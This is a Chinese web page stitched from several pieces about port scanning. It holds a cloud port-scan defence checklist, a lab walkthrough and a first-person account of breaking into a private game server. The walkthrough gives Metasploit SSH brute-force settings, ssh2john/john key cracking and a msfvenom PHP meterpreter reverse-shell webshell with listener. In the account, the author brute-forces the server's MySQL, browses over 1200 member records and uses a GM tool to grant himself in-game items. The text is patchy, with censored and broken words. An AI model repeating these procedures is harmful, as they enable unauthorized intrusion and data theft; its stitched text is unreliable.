端口扫描的危害_22端口扫描和爆破

hacker|
162

对别人服务器端口扫描是违法行为吗?

端口扫描与嗅探都是黑客常用的招数,其目的是定位目标计算机和窃取隐私信息。现在很多网站和服务都是通过云主机提供,为了更好保护云主机安全,必须防范恶意IP对对于云主机的端口扫描和嗅探。

在对云主机进行 *** 安全防护实践过程中,常见的扫描与防范如下:

1) 端口445流量潜在扫描或感染

此类威胁是检测出445端口流量异常,可能是扫描或感染。建议对主机进行查杀,删除感染的恶意程序;设置WAF屏蔽扫描行为。

2) 潜在的SSH/SSH OUTBOUND 扫描

此类威胁是潜在的ssh扫描。建议设置iptables防止22端口扫描;设置hosts.deny拒绝ssh连接尝试。

3) 快速的终端服务器流量潜在扫描或感染(入站/出站)

此类威胁是检测出快速服务终端的流量异常,可能是扫描或感染。建议对主机进行查杀,删除感染的恶意程序;设置WAF屏蔽扫描行为。

4) 电位VNC扫描5900-5920/5800-5820

此类威胁是潜在的VNC扫描。建议升级VNC至最新版本;设置iptables防止对5900-5920端口的扫描

5) 可疑入站到MSSQL端口1433

检测出MSSQL数据库的1433端口入站流量。建议核对业务是否需要把mssql暴露到公网,不需要的话不对外暴露;对数据库进行权限最小化设置;修改密码强度。

6) 可疑入站到mySQL端口3306

检测出mysql 3306端口的入站流量。建议核对业务是否需要把mysql暴露到公网,不需要的话不对外暴露;对数据库进行权限最小化设置;修改密码强度。

7) 快速POP3连接 - 可能的暴力攻击

此类威胁是快速POP3连接,可能是爆破行为。建议设置防火墙屏蔽此类威胁。

*** 安全不仅关系到国计民生,还与国家安全密切相关,不仅涉及到国家政治、军事和经济各个方面,而且影响到国家的安全和 *** ,重视 *** 安全,从身边做起

端 *** 破是什么意思

端 *** 破是不断对主机发送连接请求,使该端口崩溃。根据查询相关 *** 息显示,端 *** 破的定义为:不断向目标主机的TCP/IP服务端口发出连接请求,使该端口来不及响应新的合法连接请求,导致系统因不能提供正常的 *** 服务而崩溃。出处为《计算机科学技术名词》第三版。

入侵开放22端口的靶机

本人笔记,仅供参考

相关靶机:

链接:

提取码:qd32

渗透分析:

对于开启ssh服务的22端口的靶场优先考虑

1.暴力破解

2.私钥泄露

对于开放http服务的80端口或者其他端口的靶场优先考虑(特别注意大于1024的端口)

1.通过浏览器访问对应靶场http服务如地址:端口号

2.使用探测工具对http的目录进行探测,如dirb 地址:端口号

挖掘敏感信息:

使用浏览器对靶场IP的http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息(有可能就是ssh的用户名信息), 递归访问,力争把每一个dirb扫描到的目录页面都访问查看;

尤其对robots.txt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);

对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;

-- nikto -host靶场IP地址

特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;

登录服务器之后,我们需要做以下操作。

1、查看当前用户whoami .

2、id 查看当前用户的权限

3、查看根目录寻找flag文件

如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一

般情况下,flag文件只属于root用户和对应的用户组:

cat /etc/passwd查看所有用户的列装

cat /etc/group查看用户组

find / -user用户名查看属于某些用户的文件

/tmp查看缓冲文件目录

深入挖掘

通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务

cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。

如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反弹shell,然后netcat执行监听获取对应用户的权限。

如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。

万不得已的时候只能对ssh服务进行暴力破解。破解最后一个

用户名。破解工具如hydra、medusa等;

利用cupp创建字典

git clone 

chmod +x cupp.py

./cupp.py -i以交互的方式创建字典

输入用户名然后一直回车到Do you want to add some random numbers at the end of words?输入yes其他全部no此时创建完成

之后推荐用metasploit破解ssh

在终端中输入

msfconsole

msf  use auxiliary/scaner/ssh/ssh_ login(使用该模块)

set rhosts  192.168.56.103(确定ip地址)

set username 用户名(破解的用户名)

set pass_ file 用户名.txt(刚刚创建的字典)

set threads  5(输入线程)

Run(进攻)

此时破解出密码例如123

直接连接,如果出现问题可以重启msfconsole,启用该模块后

set rhosts 192.168.56.103             (连接远程主机)

set username hadi(用户名)

Set password 123(密码)

Run

界面简陋就使用python优化界面

Python -c “import pty;pty.spawn(‘/bin/bash’)”(优化界面)

此时可以把自己权限提升到root:

su - root

回到根目录ls打开flag文件

Ssh秘钥泄露

解密Ssh秘钥信息(以秘钥名id_isa举例)

Chmod  600 id_isa(赋予is_isa可读可写权限)

ssh2john id_isa  isacrack       (就是用ssh2john把秘钥里的东西转换成john可识别的)

Zcat  /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)

*** webshell

msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw  /root/Desktop/shell.php

启动监听

msf  use exploit/multi/handler

msf exploit(handler)  set payload php/meterpreter/reverse_tcp

Weoshell

msf exploit(handler)  set Ihost攻击机IP地址

msf exploit(handler)  set lport 4444

msf exploit(handler) run

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。 执行

webshel(访问具有webshell的php页面)

获得反弹的shell

--

wordpress.上传点theme 404.php

执行: http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

旗鱼云梯Linux端口扫描防护

端口扫描是指某些别有用心的人发送一组端口扫描消息,试图以此侵入某台计算机,并了解其提供的计算机 *** 服务类型(这些 *** 服务均与端口号相关)。端口扫描是计算机攻击的之一步,攻击者可以通过它了解到从哪里可探寻到攻击弱点。实质上,端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。

在Linux上每个通过 *** 访问的程序都要监听一个端口,并通过此端口去访问。比如常用的端口: 22,80,443,3306,6379分别对应的是ssh服务,http服务,https服务,mysql服务,redis服务的默认端口。比如我们访问旗鱼云梯的网站 其实访问的是 或者 443. 比如MySQL开放远程权限允许远程访问的话,那么我们将通过ip:3306去访问mysql服务,redis同样如此 通过ip:6379访问redis服务。如果密码设置简单的话几下就被爆破了,mysql密码设置为123456,一下就爆破了。。。

对于常用服务除了80,443以外非常建议修改默认端口号,

说这么多,那跟端口扫描有什么关系呢?

当我们把SSH默认端口22修改为其他端口比如23456端口, 那么黑客想要继续对我服务器进行SSH爆破那怎么办呢?

演示的我就直接指定端口扫描了,不然扫描全端口扫描太慢了。黑客一般用的都是端口扫描工具进行全端口扫描。

旗鱼云梯根据客户反馈和需求,推出端口防扫描安全防护,自动检测非法端口扫描IP,超过阈值自动封禁,从源头加固主机安全。保护服务器不受端口扫描的危害,坚守之一道防线。

dnf私服默认密码

首先对他的注册页面和有页面的地方进行测试,经过一通扫描发现没啥可利用的。

然后在登录的时候进行抓包。我们抓到如下请求

GET /action.php?username=xxpassword=c9faa633110ba676152fd8535cac1bedmac_md5=d8c904b16ec49d9f58054ab764fdd548type=login HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: xx.x.x:66

Cache-Control: no-cache

发现url可以爆破,这里url爆破的 *** 也很简单,开启浏览器 *** ,burp开启拦截后,访问host+GET后面的内容。

然后你会抓到一个请求。发送到intruder然后设置好两个变量,导入字典即可。

这里需要注意下,由于登录时密码被自动加密成MD5,所以你爆破的时候也要把密码字典批量加密成md5才可以。

登陆成功的返回值

登陆失败的返回值

ping一下数据包里面host我们得到服务器的IP地址为x.x.x.x

然后我们用scanport扫描下端口。发现开放了22、3306、111、849等等端口。

0x02 开始突破

22端口是SSH的端口。3306是Mysql端口,我们从这两个地方入手。

两个端口都开启爆破工具。SSH用Test404的爆破工具(速度有点慢) 3306端口用Cookmysql工具爆破。

经过漫长的等待后发现3306爆破成功了,点击查看成功按钮,我们得到数据库密码123.321..123...

现在我们打开navicat软件,填入服务器IP地址、用户名和密码,然后保存。

然后在左侧双击刚刚添加的服务器,直接进入数据库管理。

到处翻了一下,发现会员表里面有1200多条会员记录......

看了半天表示一脸懵逼,不知道我个人的数据储存在哪里。

都到这里了,当然不能放弃,我继续百度查询了一些资料。

得知这种SF基本都有GM工具,然后继续搜索各种GM工具做进一步测试。

最后测试以下这款GM工具连接数据库成功。

0x03 给账号修改数据

这里为了预防游戏服务器有登陆和注册时的IP记录,避免被社,我用上 *** 以后重新注册一个账号。(我之前玩的号IP是自己真实的)

在GM工具输入我的账号,点击查询,找到我的角色后,选中。

切换到邮件功能,给我发了一些金币和武器作为测试。

重新进游戏,发现邮箱里面已经有金币过来了。O(∩_∩)O哈哈~

研究了一下,这个GM工具还能发商城道具和其他物品,具体就不演示了。

现在去我朋友面前装下逼。哈哈......

0x04 总结

由于对方对外开放了22端口SSH 3306端口 MYSQL,所以导致被我爆破。

在我们日常使用中,可以限制3306端口和22端口的连接IP白名单,这样就可以避免被爆破。

如果不设置白名单,那么账号密码一定要设置得尽量复杂,在设置密码的时候,可以通过各大社工库查询是否被泄露过。

注:SSH和3306爆破工具回复SSH获取下载链接

声明:工具来源于 *** ,安全性未知,请在虚拟机下测试,由于软件具有一定的攻击性,请勿用于非法用途,否则发生的一切后果自负。

0条大神的评论

发表评论